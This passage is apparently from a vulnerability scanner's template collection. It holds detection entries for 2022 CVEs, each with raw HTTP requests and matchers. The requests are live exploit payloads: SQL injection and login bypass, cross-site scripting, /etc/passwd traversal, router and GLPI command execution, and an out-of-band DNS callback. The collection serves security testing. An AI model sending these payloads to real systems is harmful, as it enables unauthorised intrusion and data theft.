- SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-46463","info":{"name":"Harbor <=2.5.3 - Unauthorized Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v2.0/search?q=/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository_name","project_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0479","info":{"name":"Popup Builder Plugin - SQL Injection and Cross-Site Scripting","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"/wp-content/plugins/popup-builder\")"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscription-popup-id=0%29+union+all++select+1%2C0x3c696d6720737263206f6e6572726f723d616c65727428646f63756d656e742e646f6d61696e293e%2C3%2C4%2C5%2C6+--+g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=onerror=alert(document.domain)></td><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0658","info":{"name":"CommonsBooking < 2.6.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, \"partiallyBookedDays\") && contains(body, \"lockDays\")"],"condition":"and"}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48166","info":{"name":"Wavlink WL-WN530HG4 M30HG4.V5030.201217 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WN530HG4\")"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Login=\", \"Password=\", \"WiFi_\", \"WAVLINK\")","contains_all(header, \"application/octet-stream\", \"filename=\\\"\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-29013","info":{"name":"Razer Sila Gaming Router - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ubus/"],"headers":{"Origin":"{{RootURL}}","Referer":"{{ROotURL}}","X-Requested-With":"XMLHttpRequest"},"body":"{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"30ebdc7dd1f519beb4b2175e9dd8463e\",\"file\",\"exec\",{\"command\":\"id\"}]}\n","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"]},{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc1}}&hfoo={{cmd}}&hhook=array_map\n"]},{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc2}}&hfoo={{cmd}}&hhook=array_map\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0087","info":{"name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/signin?from=https://interact.sh","{{BaseURL}}/signin?from=javascript:alert(document.cookie)"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"word","part":"body","words":["alert(document.cookie)"]}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d